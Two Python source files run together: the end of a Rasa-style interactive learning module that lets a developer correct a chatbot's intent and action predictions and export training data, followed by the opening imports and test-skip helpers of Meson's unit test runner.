predictions: List[Dict[Text, Any]], conversation_id: Text, endpoint: EndpointConfig
) -> Tuple[Text, bool]:
"""Ask the user to correct an action prediction."""
await _print_history(conversation_id, endpoint)
choices = [
{
"name": f'{a.get("score"):03.2f} {a.get("action"):40}',
"value": a.get("action"),
}
for a in predictions
]
tracker = await retrieve_tracker(endpoint, conversation_id)
events = tracker.get("events", [])
session_actions_all = [a["name"] for a in _collect_actions(events)]
session_actions_unique = list(set(session_actions_all))
old_actions = [action["value"] for action in choices]
new_actions = [
{"name": action, "value": OTHER_ACTION + action}
for action in session_actions_unique
if action not in old_actions
]
choices = (
[{"name": "<create new action>", "value": NEW_ACTION}] + new_actions + choices
)
question = questionary.select("What is the next action of the bot?", choices)
action_name = await _ask_questions(question, conversation_id, endpoint)
is_new_action = action_name == NEW_ACTION
if is_new_action:
# create new action
action_name = await _request_free_text_action(conversation_id, endpoint)
if action_name.startswith(UTTER_PREFIX):
utter_message = await _request_free_text_utterance(
conversation_id, endpoint, action_name
)
NEW_TEMPLATES[action_name] = {utter_message: ""}
elif action_name[:32] == OTHER_ACTION:
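# OTHER_ACTION is uuid.uuid4().hex (32 characters); the chosen value was stored as that sentinel plus the real action name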
# action was newly created in the session, but not this turn
is_new_action = True
action_name = action_name[32:]
print(f"Thanks! The bot will now run {action_name}.\n")
return action_name, is_new_action
def _request_export_info() -> Tuple[Text, Text, Text]:
"""Request file path and export stories & nlu data to that path"""
# export training data and quit
questions = questionary.form(
export_stories=questionary.text(
message="Export stories to (if file exists, this "
"will append the stories)",
default=PATHS["stories"],
validate=io_utils.file_type_validator(
[".md"],
"Please provide a valid export path for the stories, e.g. 'stories.md'.",
),
),
export_nlu=questionary.text(
message="Export NLU data to (if file exists, this will "
"merge learned data with previous training examples)",
default=PATHS["nlu"],
validate=io_utils.file_type_validator(
[".md", ".json"],
"Please provide a valid export path for the NLU data, e.g. 'nlu.md'.",
),
),
export_domain=questionary.text(
message="Export domain file to (if file exists, this "
"will be overwritten)",
default=PATHS["domain"],
validate=io_utils.file_type_validator(
[".yml", ".yaml"],
"Please provide a valid export path for the domain file, e.g. 'domain.yml'.",
),
),
)
answers = questions.ask()
if not answers:
raise Abort()
return answers["export_stories"], answers["export_nlu"], answers["export_domain"]
def _split_conversation_at_restarts(
events: List[Dict[Text, Any]]
) -> List[List[Dict[Text, Any]]]:
"""Split a conversation at restart events.
Returns an array of event lists, without the restart events."""
sub_conversations = []
current = []
for e in events:
if e.get("event") == "restart":
if current:
sub_conversations.append(current)
current = []
else:
current.append(e)
if current:
sub_conversations.append(current)
return sub_conversations
def _collect_messages(events: List[Dict[Text, Any]]) -> List[Message]:
"""Collect the message text and parsed data from the UserMessage events
into a list"""
import rasa.nlu.training_data.util as rasa_nlu_training_data_utils
messages = []
for event in events:
if event.get("event") == UserUttered.type_name:
data = event.get("parse_data", {})
rasa_nlu_training_data_utils.remove_untrainable_entities_from(data)
msg = Message.build(data["text"], data["intent"]["name"], data["entities"])
messages.append(msg)
elif event.get("event") == UserUtteranceReverted.type_name and messages:
messages.pop() # user corrected the nlu, remove incorrect example
return messages
def _collect_actions(events: List[Dict[Text, Any]]) -> List[Dict[Text, Any]]:
"""Collect all the `ActionExecuted` events into a list."""
return [evt for evt in events if evt.get("event") == ActionExecuted.type_name]
async def _write_stories_to_file(
export_story_path: Text, events: List[Dict[Text, Any]], domain: Domain
) -> None:
"""Write the conversation of the conversation_id to the file paths."""
sub_conversations = _split_conversation_at_restarts(events)
io_utils.create_path(export_story_path)
if os.path.exists(export_story_path):
append_write = "a" # append if already exists
else:
append_write = "w" # make a new file if not
with open(export_story_path, append_write, encoding=io_utils.DEFAULT_ENCODING) as f:
i = 1
for conversation in sub_conversations:
parsed_events = rasa.core.events.deserialise_events(conversation)
tracker = DialogueStateTracker.from_events(
f"interactive_story_{i}", evts=parsed_events, slots=domain.slots
)
if any(
isinstance(event, UserUttered) for event in tracker.applied_events()
):
i += 1
f.write("\n" + tracker.export_stories(SAVE_IN_E2E))
def _filter_messages(msgs: List[Message]) -> List[Message]:
"""Filter messages removing those that start with INTENT_MESSAGE_PREFIX"""
filtered_messages = []
for msg in msgs:
if not msg.text.startswith(INTENT_MESSAGE_PREFIX):
filtered_messages.append(msg)
return filtered_messages
async def _write_nlu_to_file(
export_nlu_path: Text, events: List[Dict[Text, Any]]
) -> None:
"""Write the nlu data of the conversation_id to the file paths."""
from rasa.nlu.training_data import TrainingData
msgs = _collect_messages(events)
msgs = _filter_messages(msgs)
# noinspection PyBroadException
try:
previous_examples = loading.load_data(export_nlu_path)
except Exception as e:
logger.debug(
f"An exception occurred while trying to load the NLU data. {str(e)}"
)
# No previous file exists, use empty training data as replacement.
previous_examples = TrainingData()
nlu_data = previous_examples.merge(TrainingData(msgs))
# guess the target format from the existing file before it is opened for
# writing, since guessing the format requires reading the file
nlu_format = _get_nlu_target_format(export_nlu_path)
if nlu_format == MARKDOWN:
stringified_training_data = nlu_data.nlu_as_markdown()
else:
stringified_training_data = nlu_data.nlu_as_json()
io_utils.write_text_file(stringified_training_data, export_nlu_path)
def _get_nlu_target_format(export_path: Text) -> Text:
guessed_format = loading.guess_format(export_path)
if guessed_format not in {MARKDOWN, RASA}:
if export_path.endswith(".json"):
guessed_format = RASA
else:
guessed_format = MARKDOWN
return guessed_format
def _entities_from_messages(messages: List[Message]) -> List[Text]:
"""Return all entities that occur in at least one of the messages."""
return list({e["entity"] for m in messages for e in m.data.get("entities", [])})
def _intents_from_messages(messages: List[Message]) -> Set[Text]:
"""Return all intents that occur in at least one of the messages."""
# set of distinct intents
distinct_intents = {m.data["intent"] for m in messages if "intent" in m.data}
return distinct_intents
async def _write_domain_to_file(
domain_path: Text, events: List[Dict[Text, Any]], old_domain: Domain
) -> None:
"""Write an updated domain file to the file path."""
io_utils.create_path(domain_path)
messages = _collect_messages(events)
actions = _collect_actions(events)
templates = NEW_TEMPLATES # type: Dict[Text, List[Dict[Text, Any]]]
# TODO for now there is no way to distinguish between action and form
collected_actions = list(
{e["name"] for e in actions if e["name"] not in default_action_names()}
)
new_domain = Domain(
intents=_intents_from_messages(messages),
entities=_entities_from_messages(messages),
slots=[],
templates=templates,
action_names=collected_actions,
form_names=[],
)
old_domain.merge(new_domain).persist_clean(domain_path)
async def _predict_till_next_listen(
endpoint: EndpointConfig,
conversation_id: Text,
conversation_ids: List[Text],
plot_file: Optional[Text],
) -> None:
"""Predict and validate actions until we need to wait for a user message."""
listen = False
while not listen:
result = await request_prediction(endpoint, conversation_id)
predictions = result.get("scores")
probabilities = [prediction["score"] for prediction in predictions]
pred_out = int(np.argmax(probabilities))
action_name = predictions[pred_out].get("action")
policy = result.get("policy")
confidence = result.get("confidence")
await _print_history(conversation_id, endpoint)
await _plot_trackers(
conversation_ids,
plot_file,
endpoint,
unconfirmed=[ActionExecuted(action_name)],
)
listen = await _validate_action(
action_name, policy, confidence, predictions, endpoint, conversation_id
)
await _plot_trackers(conversation_ids, plot_file, endpoint)
tracker_dump = await retrieve_tracker(
endpoint, conversation_id, EventVerbosity.AFTER_RESTART
)
events = tracker_dump.get("events", [])
if len(events) >= 2:
last_event = events[-2] # last event before action_listen
# if bot message includes buttons the user will get a list choice to reply
# the list choice is displayed in place of action listen
if last_event.get("event") == BotUttered.type_name and last_event["data"].get(
"buttons", None
):
response = _get_button_choice(last_event)
if response != cli_utils.FREE_TEXT_INPUT_PROMPT:
await send_message(endpoint, conversation_id, response)
def _get_button_choice(last_event: Dict[Text, Any]) -> Text:
data = last_event["data"]
message = last_event.get("text", "")
choices = cli_utils.button_choices_from_message_data(
data, allow_free_text_input=True
)
question = questionary.select(message, choices)
response = cli_utils.payload_from_button_question(question)
return response
async def _correct_wrong_nlu(
corrected_nlu: Dict[Text, Any],
events: List[Dict[Text, Any]],
endpoint: EndpointConfig,
conversation_id: Text,
) -> None:
"""A wrong NLU prediction got corrected, update core's tracker."""
revert_latest_user_utterance = UserUtteranceReverted().as_dict()
# `UserUtteranceReverted` also removes the preceding `ACTION_LISTEN` event, hence
# we have to replay it.
listen_for_next_message = ActionExecuted(ACTION_LISTEN_NAME).as_dict()
corrected_message = latest_user_message(events)
if corrected_message is None:
raise Exception("Failed to correct NLU data. User message not found.")
corrected_message["parse_data"] = corrected_nlu
await send_event(
endpoint,
conversation_id,
[revert_latest_user_utterance, listen_for_next_message, corrected_message],
)
async def _correct_wrong_action(
corrected_action: Text,
endpoint: EndpointConfig,
conversation_id: Text,
is_new_action: bool = False,
) -> None:
"""A wrong action prediction got corrected, update core's tracker."""
await send_action(
endpoint, conversation_id, corrected_action, is_new_action=is_new_action
)
def _form_is_rejected(action_name: Text, tracker: Dict[Text, Any]) -> bool:
"""Check if the form got rejected with the most recent action name."""
return (
tracker.get("active_form", {}).get("name")
and action_name != tracker["active_form"]["name"]
and action_name != ACTION_LISTEN_NAME
)
def _form_is_restored(action_name: Text, tracker: Dict[Text, Any]) -> bool:
"""Check whether the form is called again after it was rejected."""
return (
tracker.get("active_form", {}).get("rejected")
and tracker.get("latest_action_name") == ACTION_LISTEN_NAME
and action_name == tracker.get("active_form", {}).get("name")
)
async def _confirm_form_validation(
action_name, tracker, endpoint, conversation_id
) -> None:
"""Ask a user whether an input for a form should be validated.
Previous to this call, the active form was chosen after it was rejected."""
requested_slot = tracker.get("slots", {}).get(REQUESTED_SLOT)
validation_questions = questionary.confirm(
f"Should '{action_name}' validate user input to fill "
f"the slot '{requested_slot}'?"
)
validate_input = await _ask_questions(
validation_questions, conversation_id, endpoint
)
if not validate_input:
# notify form action to skip validation
await send_event(
endpoint, conversation_id, {"event": "form_validation", "validate": False}
)
elif not tracker.get("active_form", {}).get("validate"):
# handle contradiction with learned behaviour
warning_question = questionary.confirm(
"ERROR: FormPolicy predicted no form validation "
"based on previous training stories. "
"Make sure to remove contradictory stories "
"from training data. "
"Otherwise predicting no form validation "
"will not work as expected."
)
await _ask_questions(warning_question, conversation_id, endpoint)
# notify form action to validate an input
await send_event(
endpoint, conversation_id, {"event": "form_validation", "validate": True}
)
async def _validate_action(
action_name: Text,
policy: Text,
confidence: float,
predictions: List[Dict[Text, Any]],
endpoint: EndpointConfig,
conversation_id: Text,
) -> bool:
"""Query the user to validate if an action prediction is correct.
Returns `True` if the prediction is correct, `False` otherwise."""
question = questionary.confirm(f"The bot wants to run '{action_name}', correct?")
is_correct = await _ask_questions(question, conversation_id, endpoint)
if not is_correct:
action_name, is_new_action = await _request_action_from_user(
predictions, conversation_id, endpoint
)
else:
is_new_action = False
tracker = await retrieve_tracker(
endpoint, conversation_id, EventVerbosity.AFTER_RESTART
)
if _form_is_rejected(action_name, tracker):
# notify the tracker that form was rejected
await send_event(
endpoint,
conversation_id,
{
"event": "action_execution_rejected",
"name": tracker["active_form"]["name"],
},
)
elif _form_is_restored(action_name, tracker):
await _confirm_form_validation(action_name, tracker, endpoint, conversation_id)
if not is_correct:
await _correct_wrong_action(
action_name, endpoint, conversation_id, is_new_action=is_new_action
)
else:
await send_action(endpoint, conversation_id, action_name, policy, confidence)
return action_name == ACTION_LISTEN_NAME
def _as_md_message(parse_data: Dict[Text, Any]) -> Text:
"""Display the parse data of a message in markdown format."""
from rasa.nlu.training_data.formats import MarkdownWriter
if parse_data.get("text", "").startswith(INTENT_MESSAGE_PREFIX):
return parse_data["text"]
if not parse_data.get("entities"):
parse_data["entities"] = []
return MarkdownWriter.generate_message_md(parse_data)
def _validate_user_regex(latest_message: Dict[Text, Any], intents: List[Text]) -> bool:
"""Validate if a users message input is correct.
This assumes the user entered an intent directly, e.g. using
`/greet`. Return `True` if the intent is a known one."""
parse_data = latest_message.get("parse_data", {})
intent = parse_data.get("intent", {}).get("name")
if intent in intents:
return True
else:
return False
async def _validate_user_text(
latest_message: Dict[Text, Any], endpoint: EndpointConfig, conversation_id: Text
) -> bool:
"""Validate a user message input as free text.
This assumes the user message is a text message (so NOT `/greet`)."""
parse_data = latest_message.get("parse_data", {})
text = _as_md_message(parse_data)
intent = parse_data.get("intent", {}).get("name")
entities = parse_data.get("entities", [])
if entities:
message = (
f"Is the intent '{intent}' correct for '{text}' and are "
f"all entities labeled correctly?"
)
else:
message = (
f"Your NLU model classified '{text}' with intent '{intent}'"
f" and there are no entities, is this correct?"
)
if intent is None:
print(f"The NLU classification for '{text}' returned '{intent}'")
return False
else:
question = questionary.confirm(message)
return await _ask_questions(question, conversation_id, endpoint)
async def _validate_nlu(
intents: List[Text], endpoint: EndpointConfig, conversation_id: Text
) -> None:
"""Validate if a user message, either text or intent is correct.
If the prediction of the latest user message is incorrect,
the tracker will be corrected with the correct intent / entities."""
tracker = await retrieve_tracker(
endpoint, conversation_id, EventVerbosity.AFTER_RESTART
)
latest_message = latest_user_message(tracker.get("events", [])) or {}
if latest_message.get("text", "").startswith( # pytype: disable=attribute-error
INTENT_MESSAGE_PREFIX
):
valid = _validate_user_regex(latest_message, intents)
else:
valid = await _validate_user_text(latest_message, endpoint, conversation_id)
if not valid:
corrected_intent = await _request_intent_from_user(
latest_message, intents, conversation_id, endpoint
)
# corrected intents have confidence 1.0
corrected_intent["confidence"] = 1.0
events = tracker.get("events", [])
entities = await _correct_entities(latest_message, endpoint, conversation_id)
corrected_nlu = {
"intent": corrected_intent,
"entities": entities,
"text": latest_message.get("text"),
}
await _correct_wrong_nlu(corrected_nlu, events, endpoint, conversation_id)
async def _correct_entities(
latest_message: Dict[Text, Any], endpoint: EndpointConfig, conversation_id: Text
) -> List[Dict[Text, Any]]:
"""Validate the entities of a user message.
Returns the corrected entities."""
from rasa.nlu.training_data.formats import MarkdownReader
parse_original = latest_message.get("parse_data", {})
entity_str = _as_md_message(parse_original)
question = questionary.text(
"Please mark the entities using [value](type) notation", default=entity_str
)
annotation = await _ask_questions(question, conversation_id, endpoint)
# noinspection PyProtectedMember
parse_annotated = MarkdownReader().parse_training_example(annotation)
corrected_entities = _merge_annotated_and_original_entities(
parse_annotated, parse_original
)
return corrected_entities
def _merge_annotated_and_original_entities(
parse_annotated: Message, parse_original: Dict[Text, Any]
) -> List[Dict[Text, Any]]:
# overwrite entities which have already been
# annotated in the original annotation to preserve
# additional entity parser information
entities = parse_annotated.get("entities", [])[:]
for i, entity in enumerate(entities):
for original_entity in parse_original.get("entities", []):
if _is_same_entity_annotation(entity, original_entity):
entities[i] = original_entity
break
return entities
def _is_same_entity_annotation(entity, other) -> Any:
return entity["value"] == other["value"] and entity["entity"] == other["entity"]
async def _enter_user_message(conversation_id: Text, endpoint: EndpointConfig) -> None:
"""Request a new message from the user."""
question = questionary.text("Your input ->")
message = await _ask_questions(question, conversation_id, endpoint, lambda a: not a)
if message == (INTENT_MESSAGE_PREFIX + constants.USER_INTENT_RESTART):
raise RestartConversation()
await send_message(endpoint, conversation_id, message)
async def is_listening_for_message(
conversation_id: Text, endpoint: EndpointConfig
) -> bool:
"""Check if the conversation is in need for a user message."""
tracker = await retrieve_tracker(endpoint, conversation_id, EventVerbosity.APPLIED)
for i, e in enumerate(reversed(tracker.get("events", []))):
if e.get("event") == UserUttered.type_name:
return False
elif e.get("event") == ActionExecuted.type_name:
return e.get("name") == ACTION_LISTEN_NAME
return False
async def _undo_latest(conversation_id: Text, endpoint: EndpointConfig) -> None:
"""Undo either the latest bot action or user message, whatever is last."""
tracker = await retrieve_tracker(endpoint, conversation_id, EventVerbosity.ALL)
# Get the latest `UserUttered` or `ActionExecuted` event.
last_event_type = None
for i, e in enumerate(reversed(tracker.get("events", []))):
last_event_type = e.get("event")
if last_event_type in {ActionExecuted.type_name, UserUttered.type_name}:
break
elif last_event_type == Restarted.type_name:
break
if last_event_type == ActionExecuted.type_name:
undo_action = ActionReverted().as_dict()
await send_event(endpoint, conversation_id, undo_action)
elif last_event_type == UserUttered.type_name:
undo_user_message = UserUtteranceReverted().as_dict()
listen_for_next_message = ActionExecuted(ACTION_LISTEN_NAME).as_dict()
await send_event(
endpoint, conversation_id, [undo_user_message, listen_for_next_message]
)
async def _fetch_events(
conversation_ids: List[Union[Text, List[Event]]], endpoint: EndpointConfig
) -> List[List[Event]]:
"""Retrieve all event trackers from the endpoint for all conversation ids."""
event_sequences = []
for conversation_id in conversation_ids:
if isinstance(conversation_id, str):
tracker = await retrieve_tracker(endpoint, conversation_id)
events = tracker.get("events", [])
for conversation in _split_conversation_at_restarts(events):
parsed_events = rasa.core.events.deserialise_events(conversation)
event_sequences.append(parsed_events)
else:
event_sequences.append(conversation_id)
return event_sequences
async def _plot_trackers(
conversation_ids: List[Union[Text, List[Event]]],
output_file: Optional[Text],
endpoint: EndpointConfig,
unconfirmed: Optional[List[Event]] = None,
) -> None:
"""Create a plot of the trackers of the passed conversation ids.
This assumes that the last conversation id is the conversation we are currently
working on. If there are events that are not part of this active tracker
yet, they can be passed as part of `unconfirmed`. They will be appended
to the currently active conversation."""
if not output_file or not conversation_ids:
# if there is no output file provided, we are going to skip plotting
# same happens if there are no conversation ids
return
event_sequences = await _fetch_events(conversation_ids, endpoint)
if unconfirmed:
event_sequences[-1].extend(unconfirmed)
graph = await visualize_neighborhood(
event_sequences[-1], event_sequences, output_file=None, max_history=2
)
from networkx.drawing.nx_pydot import write_dot
write_dot(graph, output_file)
def _print_help(skip_visualization: bool) -> None:
"""Print some initial help message for the user."""
if not skip_visualization:
visualization_url = DEFAULT_SERVER_FORMAT.format(
"http", DEFAULT_SERVER_PORT + 1
)
visualization_help = (
f"Visualisation at {visualization_url}/visualization.html ."
)
else:
visualization_help = ""
rasa.cli.utils.print_success(
f"Bot loaded. {visualization_help}\n"
f"Type a message and press enter "
f"(press 'Ctr-c' to exit)."
)
async def record_messages(
endpoint: EndpointConfig,
file_importer: TrainingDataImporter,
conversation_id: Text = UserMessage.DEFAULT_SENDER_ID,
max_message_limit: Optional[int] = None,
skip_visualization: bool = False,
) -> None:
"""Read messages from the command line and print bot responses."""
try:
try:
domain = await retrieve_domain(endpoint)
except ClientError:
logger.exception(
f"Failed to connect to Rasa Core server at '{endpoint.url}'. "
f"Is the server running?"
)
return
intents = [next(iter(i)) for i in (domain.get("intents") or [])]
num_messages = 0
if not skip_visualization:
events_including_current_user_id = await _get_tracker_events_to_plot(
domain, file_importer, conversation_id
)
plot_file = DEFAULT_STORY_GRAPH_FILE
await _plot_trackers(events_including_current_user_id, plot_file, endpoint)
else:
# `None` means that future `_plot_trackers` calls will also skip the
# visualization.
plot_file = None
events_including_current_user_id = []
_print_help(skip_visualization)
while not utils.is_limit_reached(num_messages, max_message_limit):
try:
if await is_listening_for_message(conversation_id, endpoint):
await _enter_user_message(conversation_id, endpoint)
await _validate_nlu(intents, endpoint, conversation_id)
await _predict_till_next_listen(
endpoint,
conversation_id,
events_including_current_user_id,
plot_file,
)
num_messages += 1
except RestartConversation:
await send_event(endpoint, conversation_id, Restarted().as_dict())
await send_event(
endpoint,
conversation_id,
ActionExecuted(ACTION_LISTEN_NAME).as_dict(),
)
logger.info("Restarted conversation, starting a new one.")
except UndoLastStep:
await _undo_latest(conversation_id, endpoint)
await _print_history(conversation_id, endpoint)
except ForkTracker:
await _print_history(conversation_id, endpoint)
events_fork = await _request_fork_from_user(conversation_id, endpoint)
await send_event(endpoint, conversation_id, Restarted().as_dict())
if events_fork:
for evt in events_fork:
await send_event(endpoint, conversation_id, evt)
logger.info("Restarted conversation at fork.")
await _print_history(conversation_id, endpoint)
await _plot_trackers(
events_including_current_user_id, plot_file, endpoint
)
except Abort:
return
except Exception:
logger.exception("An exception occurred while recording messages.")
raise
async def _get_tracker_events_to_plot(
domain: Dict[Text, Any], file_importer: TrainingDataImporter, conversation_id: Text,
) -> List[Union[Text, List[Event]]]:
training_trackers = await _get_training_trackers(file_importer, domain)
number_of_trackers = len(training_trackers)
if number_of_trackers > MAX_NUMBER_OF_TRAINING_STORIES_FOR_VISUALIZATION:
rasa.cli.utils.print_warning(
f"You have {number_of_trackers} different story paths in "
f"your training data. Visualizing them is very resource "
f"consuming. Hence, the visualization will only show the stories "
f"which you created during interactive learning, but not your "
f"training stories."
)
training_trackers = []
training_data_events = [t.events for t in training_trackers]
events_including_current_user_id = training_data_events + [conversation_id]
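# the list mixes ready-made event sequences with the live conversation id; _fetch_events later resolves the id into events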
return events_including_current_user_id
async def _get_training_trackers(
file_importer: TrainingDataImporter, domain: Dict[str, Any]
) -> List[DialogueStateTracker]:
from rasa.core import training
return await training.load_data(
file_importer,
Domain.from_dict(domain),
augmentation_factor=0,
use_story_concatenation=False,
)
def _serve_application(
app: Sanic,
file_importer: TrainingDataImporter,
skip_visualization: bool,
conversation_id: Text,
) -> Sanic:
"""Start a core server and attach the interactive learning IO."""
endpoint = EndpointConfig(url=DEFAULT_SERVER_URL)
async def run_interactive_io(running_app: Sanic) -> None:
"""Small wrapper to shut down the server once cmd io is done."""
await record_messages(
endpoint=endpoint,
file_importer=file_importer,
skip_visualization=skip_visualization,
conversation_id=conversation_id,
)
logger.info("Killing Sanic server now.")
running_app.stop() # kill the sanic server
app.add_task(run_interactive_io)
update_sanic_log_level()
app.run(host="0.0.0.0", port=DEFAULT_SERVER_PORT)
return app
def start_visualization(image_path: Text = None) -> None:
"""Add routes to serve the conversation visualization files."""
app = Sanic(__name__)
# noinspection PyUnusedLocal
@app.exception(NotFound)
async def ignore_404s(request, exception):
return response.text("Not found", status=404)
# noinspection PyUnusedLocal
@app.route(VISUALIZATION_TEMPLATE_PATH, methods=["GET"])
def visualisation_html(request):
return response.file(visualization.visualization_html_path())
# noinspection PyUnusedLocal
@app.route("/visualization.dot", methods=["GET"])
def visualisation_png(request):
try:
headers = {"Cache-Control": "no-cache"}
return response.file(os.path.abspath(image_path), headers=headers)
except FileNotFoundError:
return response.text("", 404)
update_sanic_log_level()
app.run(host="0.0.0.0", port=DEFAULT_SERVER_PORT + 1, access_log=False)
# noinspection PyUnusedLocal
async def train_agent_on_start(
args, endpoints, additional_arguments, app, loop
) -> None:
_interpreter = NaturalLanguageInterpreter.create(endpoints.nlu or args.get("nlu"))
model_directory = args.get("out", tempfile.mkdtemp(suffix="_core_model"))
_agent = await train(
args.get("domain"),
args.get("stories"),
model_directory,
_interpreter,
endpoints,
args.get("config")[0],
None,
additional_arguments,
)
app.agent = _agent
async def wait_til_server_is_running(
endpoint, max_retries=30, sleep_between_retries=1
) -> bool:
"""Try to reach the server, retry a couple of times and sleep in between."""
while max_retries:
try:
r = await retrieve_status(endpoint)
logger.info(f"Reached core: {r}")
if not r.get("is_ready"):
# the server has not finished loading the agent yet;
# in this case we need to wait until the model has finished training,
# so we might be sleeping for a while...
await asyncio.sleep(sleep_between_retries)
continue
else:
# server is ready to go
return True
except ClientError:
max_retries -= 1
if max_retries:
await asyncio.sleep(sleep_between_retries)
return False
def run_interactive_learning(
file_importer: TrainingDataImporter,
skip_visualization: bool = False,
conversation_id: Text = uuid.uuid4().hex,
server_args: Dict[Text, Any] = None,
) -> None:
"""Start the interactive learning with the model of the agent."""
global SAVE_IN_E2E
server_args = server_args or {}
if server_args.get("nlu_data"):
PATHS["nlu"] = server_args["nlu_data"]
if server_args.get("stories"):
PATHS["stories"] = server_args["stories"]
if server_args.get("domain"):
PATHS["domain"] = server_args["domain"]
SAVE_IN_E2E = server_args["e2e"]
if not skip_visualization:
p = Process(target=start_visualization, args=(DEFAULT_STORY_GRAPH_FILE,))
p.daemon = True
p.start()
else:
p = None
app = run.configure_app(enable_api=True)
endpoints = AvailableEndpoints.read_endpoints(server_args.get("endpoints"))
# before_server_start handlers make sure the agent is loaded before the
# interactive learning IO starts
app.register_listener(
partial(run.load_agent_on_start, server_args.get("model"), endpoints, None),
"before_server_start",
)
_serve_application(app, file_importer, skip_visualization, conversation_id)
if not skip_visualization and p is not None:
p.terminate() # pytype: disable=attribute-error
p.join() # pytype: disable=attribute-error
|
run_unittests.py
|
#!/usr/bin/env python3
# Copyright 2016-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import typing as T
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import urllib.error
import urllib.request
import zipfile
import hashlib
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import typing as T
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.dependencies.base
import mesonbuild.compilers
import mesonbuild.envconfig
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter, ObjectHolder
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, python_command, version_compare, split_args,
quote_arg, relpath, is_linux
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException
from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram
import mesonbuild.dependencies.base
from mesonbuild.build import Target, ConfigurationData
import mesonbuild.modules.pkgconfig
from mesonbuild.mtest import TAPParser, TestResult
from run_tests import (
Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
URLOPEN_TIMEOUT = 5
@contextmanager
def chdir(path: str):
curdir = os.getcwd()
os.chdir(path)
yield
os.chdir(curdir)
def get_dynamic_section_entry(fname, entry):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF platforms')
try:
raw_out = subprocess.check_output(['readelf', '-d', fname],
universal_newlines=True)
except FileNotFoundError:
# FIXME: Try using depfixer.py:Elf() as a fallback
raise unittest.SkipTest('readelf not found')
pattern = re.compile(entry + r': \[(.*?)\]')
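# readelf -d prints entries like "Library soname: [libfoo.so.1]"; capture the value inside the brackets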
for line in raw_out.split('\n'):
m = pattern.search(line)
if m is not None:
return m.group(1)
return None # The file did not contain the specified entry.
def get_soname(fname):
return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname):
return get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
def is_tarball():
if not os.path.isdir('docs'):
return True
return False
def is_ci():
if 'CI' in os.environ:
return True
return False
def is_pull():
# Travis
if os.environ.get('TRAVIS_PULL_REQUEST', 'false') != 'false':
return True
# Azure
if 'SYSTEM_PULLREQUEST_ISFORK' in os.environ:
return True
return False
def _git_init(project_dir):
subprocess.check_call(['git', 'init'], cwd=project_dir, stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'config',
'user.name', 'Author Person'], cwd=project_dir)
subprocess.check_call(['git', 'config',
'user.email', 'teh_coderz@example.com'], cwd=project_dir)
subprocess.check_call('git add *', cwd=project_dir, shell=True,
stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
stdout=subprocess.DEVNULL)
@functools.lru_cache()
def is_real_gnu_compiler(path):
'''
Check if the gcc we have is a real gcc and not a macOS wrapper around clang
'''
if not path:
return False
out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT)
return 'Free Software Foundation' in out
def skipIfNoExecutable(exename):
'''
Skip this test if the given executable is not found.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if shutil.which(exename) is None:
raise unittest.SkipTest(exename + ' not found')
return func(*args, **kwargs)
return wrapped
return wrapper
def skipIfNoPkgconfig(f):
'''
Skip this test if no pkg-config is found, unless we're on CI.
This allows users to run our test suite without having
pkg-config installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
Note: Yes, we provide pkg-config even while running Windows CI
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
return f(*args, **kwargs)
return wrapped
def skipIfNoPkgconfigDep(depname):
'''
Skip this test if the given pkg-config dep is not found, unless we're on CI.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_no_cmake(f):
'''
Skip this test if no cmake is found, unless we're on CI.
This allows users to run our test suite without having
cmake installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('cmake') is None:
raise unittest.SkipTest('cmake not found')
return f(*args, **kwargs)
return wrapped
def skip_if_not_language(lang):
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
try:
env = get_fake_env()
f = getattr(env, 'detect_{}_compiler'.format(lang))
f(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('No {} compiler found.'.format(lang))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_env_set(key):
'''
Skip a test if a particular env is set, except when running under CI
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
old = None
if key in os.environ:
if not is_ci():
raise unittest.SkipTest('Env var {!r} set, skipping'.format(key))
old = os.environ.pop(key)
try:
